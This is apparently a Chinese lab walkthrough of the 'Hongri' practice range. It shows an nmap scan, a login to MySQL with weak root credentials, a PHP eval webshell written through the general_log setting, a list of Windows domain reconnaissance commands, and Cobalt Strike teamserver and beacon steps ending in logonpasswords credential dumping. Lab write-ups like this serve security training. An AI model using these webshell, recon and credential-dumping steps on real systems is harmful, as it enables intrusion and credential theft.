红日靶场

红日靶场

红日(一)

环境搭建

存在三台机器,win7,win2008,win2003,然后根据下面的文章进行搭建即可

不过为了方便攻击,可以将其中的NAT设置为独立的网卡,然后设置一台kali共享更好一些

[WEB安全]红日靶场(一)环境搭建_四海之水皆立的技术博客_51CTO博客

外点

nmap扫描一下

1
2
3
4
PORT     STATE SERVICE
80/tcp open http
135/tcp open msrpc
3306/tcp open mysql

存在80端口服务以及mysql数据库

web服务是phpstudy探针

并且在mysql链接的时候可以直接使用root/root进行链接,弱密码

image-20231103002523846

同时dirb扫描出来存在phpmyadmin的后台

image-20231103002453755

进入phpmyadmin的后台,可以进行查看mysql的各种配置,尝试进行提权和注入shell

MySQL 漏洞利用与提权 | 国光 (sqlsec.com)

image-20231103004630673

secure_file_priv值为空,不允许读取任意文件

image-20231103210331570

使用log进行注入,数据库存在newyxcms

1
2
3
4
set global general_log = "ON";
set global general_log_file='C:\phpStudy\www\yxcms\shell.php';
SHOW VARIABLES LIKE 'general%';
select '<?php eval($_POST["aaa"]);?>';

然后蚁剑连接即可

内网

然后进行内网的信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
ipconfig /all   查看本机ip,所在域
route print 打印路由信息
net view 查看局域网内其他主机名
arp -a 查看arp缓存
net start 查看开启了哪些服务
net share 查看开启了哪些共享
net share ipc$ 开启ipc共享
net share c$ 开启c盘共享
net use \\192.168.xx.xx\ipc$ "" /user:"" 与192.168.xx.xx建立空连接
net use \\192.168.xx.xx\c$ "密码" /user:"用户名" 建立c盘共享
dir \\192.168.xx.xx\c$\user 查看192.168.xx.xx c盘user目录下的文件

net config Workstation 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user 查看本机用户列表
net user /domain 查看域用户
net localgroup administrators 查看本地管理员组(通常会有域用户)
net view /domain 查看有几个域
net user 用户名 /domain 获取指定域用户的信息
net group /domain 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain 查看域中某工作组
net group "domain admins" /domain 查看域管理员的名字
net group "domain computers" /domain 查看域中的其他主机名
net group "doamin controllers" /domain 查看域控制器(可能有多台)

发现存在的52网段,进行横向

image-20231103234849619

首先进行CS上线操作,kali运行

1
sudo ./teamserver 192.168.58.128 cs123456

主机连接之后,生成payload

image-20231103235835730

然后进行上线

之后在下面的命令行中进行信息收集和渗透

1
2
3
4
sleep 0  // 减少回显时间
shell whoami
shell systeminfo //信息收集
logonpasswords //拿明文密码